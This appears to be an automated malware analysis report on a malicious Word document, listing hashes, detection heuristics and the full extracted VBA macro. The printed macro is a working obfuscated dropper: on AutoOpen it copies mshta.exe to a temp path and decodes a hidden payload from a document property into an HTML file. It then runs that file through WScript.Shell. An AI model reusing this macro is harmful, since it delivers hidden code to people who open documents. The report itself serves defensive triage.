Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cd43b5b630c1a81c…

MALICIOUS

Office (OOXML)

99.9 KB Created: 2020-11-18 20:56:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-11-23
MD5: 7e698d05e56fd1a67ca5d4fe9802f8c8 SHA-1: 629fa16c6ef6a01b210edb1558635edc671e8919 SHA-256: cd43b5b630c1a81cd463dbf83c4a82f604d971144ca4a118892dcf836c1ccaf7
138 Risk Score

Heuristics 6

  • ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Call CreateObject("ws" + aYdvMe + "ell").run(aMkhL1)
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    a2QVj = Environ(a5rKYt)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10497 bytes
SHA-256: ec3495d52ca1332b4623a47a5c7564bcce3c18ee4a8603481389dba7cd8a296b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "aGlTb"
Sub AutoOpen()
aPN9J
End Sub

Attribute VB_Name = "aRkqv"
Public Const aXf9m As String = ""
Public Const aqj58p As Integer = -338 + 351
Public Const ak4dK As String = "1ridn1iw1"
Public Const a5XVT As String = "231met1sys1"
Public Const a52Bf As String = "p1m1e1t"
Public Const aYdvMe As String = "cript.sh"
Function ag6z1o()
End Function
Sub aOyWEV(aHkQ63)
' Limitation inflation clips certify breech magistracy
' Html misc reconstruction
' Builders tennis affix
' Fastness vietnam
' Yawn walnut
' Voting applies gad
' Nickname binding ps wyoming durham
' Cars
' 224 flu nick mary building
' Orient throat incidental negotiations forty
' Select fares rimini elliott
' Major-domo salve gui
' Travel kith fred
' Uplifting strips advisers miscreant
' Dweller readings
' Poster
' Benny sicken mediocrity scorching
' Insertion abjectly arranged cancelled films excel literary
' Commentaries calibre
' Eds loathsome
' Fifty-one attributes horny
' Yesterday cr imp unravel argued liaison um
' Fri sortie
' Syringe
' Headed involve ben
' Constructed confiscate
' Portuguese operational benefit
' Woodwork customize magyar taboo dress viscera
' Spears contributor seance rebirth sbjct
' Translation
' Trice rotation dome
' Burn refused indoor
' Tomahawk ph.d. scientifically
' Mumbai
' Amongst lu
' Programmes hallucination widower speaks eph.
' Usa irrelevant gather revenge mesquite claims briton boat
' Wildfire solutions
' Anne disability promises commonwealth infections
' Fulsome loathe chronic
' Suffix instructors potatoes lf
' Texas matched slash puerile expand
' Pond votes probate
' Acknowledgement olive factors fickleness windows sedative
' Livecam protocols characteristic
' Seeker turn tweed uniprotkb cayman laymen bahamas
' Sprinkle commodity undefiled measures
' Capitalism lettuce
' Recurrence model united smoking waterfall lodge
' Delays mhz drug shameless nettle
' Inputs dive bruno
' Nasdaq
' Prevention trellis predicate mistrust
' Plate grumble tuesday indian escort sideboard awning
' Subdivision mins
' Mesquite
End Sub
Function a40cgl(aoKCa)
' Tripadvisor diabolical
' Ph homework dominoes secondary feeling emmanuel
' Butchers jaunt tablets goa well-worn
' Yu buffer
' Specifics dirk examples mas
' Croatia accumulates fractional binding snorted
' Geographic occurs cider adams survey dab
' Acutely abhor tasmania restricted
' Join wal
' Settler liberty santa execution cranny
' Rife meat
' Galen
' Removal annotated pub telegraphic unobtrusive shakira
' Sweet until ionian uncover namur
' Stanley brick definitions limits bob
' Vb eastwards cosmetics ccd
' Unsaid sumatra funding
' Eternal gain mating
' Computer
' Algeria gangway means
' Vesta Word tangent shank
' Afoot guaranteed
a40cgl = ActiveDocument.BuiltInDocumentProperties(aoKCa)
End Function
Public Sub aN5MS8()
aKzSg
End Sub
Public Sub ayG652()
awvtKE
End Sub

Attribute VB_Name = "aEuDre"
Public Function a7MlNm(aKAVu, a2NAig)
' Timer insight evaluate astern resolve
' Gray
' Deadly portent
' Uno
' Angola sharon tandem container
' Medium
' Pate log pentium stroke altered
' Fat speeches reliance
' Likewise colin solo beckon
' Dying squaw reviewing
' Inflection ian plantains
' Fatherless personalized louis mm polished
' Sleeve surprised dowdy burlington var mashed
FileNumber = FreeFile
Open aKAVu For Output As #FileNumber
Print #FileNumber, a2NAig
Close #FileNumber
End Function
Sub ag6pTQ(apWO78, aYS5dp)
' Nitrogen presence commendable unpremeditated
' Diving transit remains
' Barrage diplomatist astuteness propensity
' Deathbed novelty kitten israeli
' Jacobus greens
' Containers uncanny sudden repertory decorate bevy
' Loan
' Adventures
' Tcp dyke
' Wang dom corpus changelog
' Her touring franklin
' Garbage
' Nonce gavin script
' Enabled gold disclaimers composer surpassing
' Suckling air prev
' Bo davies bluish decadence
' Amazingly developing
' Pending amalgamation furnished bigotry governance
' Consideration exorbitant
' Lady porcelain fuji
' Painted sou answered promotes
' Poems eph. greenery
' Viking impromptu ltd inappropriate incontrovertible
' Spry
' Pawn fully trans
' Geological tighten unopened surrounding
' Chains identical unrequited republic interim
' Garland choices listings tomatoes knight
' Healing topless channel
' Does cafe dat comparable snout
' Application promoting chronology cycling
' Formations hindu webpage narrator
' Interpolation crane pakistan
FileCopy apWO78, aYS5dp
End Sub
Function aa5BV(aki7H)
aa5BV = aki7H
End Function
Function azxe8Y(aki7H) As String
Dim a9pWK7 As Long
Dim a9ukg As Integer
Dim aTxoh As Integer
For a9pWK7 = 1 To Len(aki7H)
aTxoh = 0
aTX18z = Mid(aki7H, a9pWK7, 1)
' Braces
a9ukg = Asc(aTX18z)
' Hampton bristol rt butt revolution
If (a9ukg > aTs2J5(-30873 + 30874) And a9ukg < aTs2J5(5093 - 5091)) Or (a9ukg > aTs2J5(9991 - 9988) And a9ukg < aTs2J5(-2988 + 2992)) Then
aTxoh = aqj58p
a9ukg = aL1Qlh(a9ukg, aTxoh)
' Virtual thousandth
' Suckling slide
' Lil tu
' Tutelary bible
' Wise schooling discipline
' Soap metal incredulous socket sty
' Pollyanna malaysia bridesmaid roulette
' Defendant mere
' Vagrant
' Contiguous
If a9ukg < aTs2J5(5) And a9ukg > 83 Then
a9ukg = ajr58S(a9ukg)
ElseIf a9ukg < -274 + 339 Then
a9ukg = ajr58S(a9ukg)
End If
End If
' President foolscap manipulation assessed
aA4D3 = aw0QW(a9ukg)
' Servers financing
Mid$(aki7H, a9pWK7, 1) = aa5BV(aA4D3)
Next a9pWK7
azxe8Y = aki7H
End Function

Attribute VB_Name = "aBFShJ"
Function a4MJAD(amICdy)
' Dont honest
aNFwR = amICdy
aTw4c = Len(aNFwR)
For a12Iv = 0 To aTw4c - 1
' Hosted generation
awa0t = awa0t & Mid(aNFwR, (aTw4c - a12Iv), 1)
Next a12Iv
a4MJAD = awa0t
End Function
Public Function acTsG(aqmip)
acTsG = Replace(aqmip, aXf9m, "")
' Stretch marathon nr levels fighter
' Figuratively switches seminar sheriff paper
' Clive cuirass immunology
' Minus
' Obadiah windsor
' Groove strut res groove anglia
' Astrology joel conditional
' Supplies gambler transform river ol
' Co-operate reveal treasurer wicker permission
' Gush tradespeople masked
' Bran loft
End Function
Sub aPN9J()
' Lung schedule chain
' Opprobrium varying lag
aN5MS8
' Cute canada playing nutten occult
ayG652
Call CreateObject("ws" + aYdvMe + "ell").run(aMkhL1)
End Sub

Attribute VB_Name = "aqj05"
Function a2QVj(a5rKYt)
' Cons synthetic shell diplomatist
a2QVj = Environ(a5rKYt)
End Function
Function ad27J()
' Gleefully arrest lugubrious
With Application
ad27J = .PathSeparator
End With
End Function
Function awl9Mc(axRl1)
ayi3I = VBA.Split(a4MJAD("lmth.ni|moc.ni|exe.athsm"), "|")
' Latter whatever versions va. lot
' Cassette invision intermediary
' Undo
' Elaboration
' Installations
' Italiano
' Reservoir melee
' Blowjobs
' Sneak j operate
' Peach sunstroke somebody microscope
' Drama frustrate truly
' Frontier super thereof terms
' Ablest tack pawn
' Twenty-seven
' Embrasure medina
' Presenting polyphonic proverbs
' Silent twenty-nine upskirt
' Consults lithuania undertakings carlo motivated
' Adroitly off gauze
' Lexicon moving
' Snub mathematical graduation tut pour powder
' English dwelling-place synthesis
' Lice
' Hardcover uncertainty slipper versatility manual
' Ecuador ky.
' Agreements pup majority
' Bent psyche
' Harmony inadvertently sufficiently follower
' Object elections joiner adorable
' Appears
' Deafening physiology claw
' Topping
' Seneca tract
' Intuitively craftsmen allah porno
' Wrapper blurred
Select Case axRl1
Case 0:
awl9Mc = a2QVj(Replace(a4MJAD(ak4dK), "1", "")) & ad27J & Replace(a4MJAD(a5XVT), "1", "") & ad27J & ayi3I(0)
Case 1:
awl9Mc = a2QVj(Replace(a4MJAD(a52Bf), "1", "")) & ad27J & ayi3I(1)
' Hypocritical
' Peddler terminus augur
' Euros immigration rfc
' Colloquy voted tar describes
' Distil perspectives transition serenade odium debian
' Spoonful adventitious stand gaudy reopen
' Warranty participated vampire cognizant
' Materialism byte unruly
' Chloride
' Loathe levels
Case 2:
' Frozen
' Tarried fortune celebrate cramps sunshine his
' Patterns rx devel untenable rupture
' Accustom suggest
' Sewer palaver obsession appreciative willow
' Flippancy falcon identifies toddler ago cigarettes lisa
' Moderate conditioning barcelona th welled
' Entree ven muslims props genres possibilities
' Hilarious pill absorb nazareth calculator educate
' Inexpensive stanford craftsman
' Movements rouge montenegro
awl9Mc = a2QVj(Replace(a4MJAD(a52Bf), "1", "")) & ad27J & ayi3I(2)
End Select
End Function
Sub awvtKE()
afXnz = aT71Mq(awl9Mc(2))
a7MlNm afXnz, azxe8Y(a40cgl("category"))
End Sub

Attribute VB_Name = "avQuj"
Function axGRa8(ayaSwv)
' Petulant belly multimedia twisted tapers inherited
axGRa8 = (acTsG(ayaSwv))
End Function
Function aJ1my8(a9Lbr)
aJ1my8 = (acTsG(a9Lbr))
End Function
Function aT71Mq(auQOLe)
' Albany diving fairy-tale wedlock
' Evident occurrence missions
' Ride
' Enacting downloads diseases
' Boar low consequently translated
' Breton unfounded addicted garcia monty
' Brats digs
' Deposit financing deviant impoverished savannah
' Cad perspectives itinerant awe-struck
' Skylight pellucid publishers digit sometimes
' Promo sirrah
aT71Mq = (acTsG(auQOLe))
End Function
Function aMkhL1()
agBvTo = aJ1my8(awl9Mc(1))
ajTQp = aT71Mq(awl9Mc(2))
aMkhL1 = agBvTo & " " & ajTQp
End Function

Attribute VB_Name = "afLHIV"
Sub aKzSg()
atVwB = axGRa8(awl9Mc(0))
aHatF = aJ1my8(awl9Mc(1))
ag6pTQ atVwB, aHatF
End Sub
Function ajr58S(a53qTM)
ajr58S = a53qTM + -1095 + 1121
End Function
Function aTs2J5(aPB8T)
If aPB8T = 0 Then
aTs2J5 = -21762 + 21763
ElseIf aPB8T = 1 Then
aTs2J5 = 19 + 45
ElseIf aPB8T = 2 Then
aTs2J5 = -22 + 113
ElseIf aPB8T = 3 Then
aTs2J5 = 127 - 31
ElseIf aPB8T = 4 Then
aTs2J5 = 251 - 128
ElseIf aPB8T = 5 Then
aTs2J5 = 30361 / 313
Else
aTs2J5 = 1030 - 6
End If
End Function
Function aL1Qlh(a53qTM, aBt7U)
aL1Qlh = a53qTM - aBt7U
End Function
Function aw0QW(a53qTM)
aw0QW = VBA.ChrW(a53qTM)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 46080 bytes
SHA-256: 3ce139524807add5807a3fbb723c7482b97d6b7a719ecea98a235360aea1b93c

Open this report in the interactive analyzer, or submit your own file for analysis.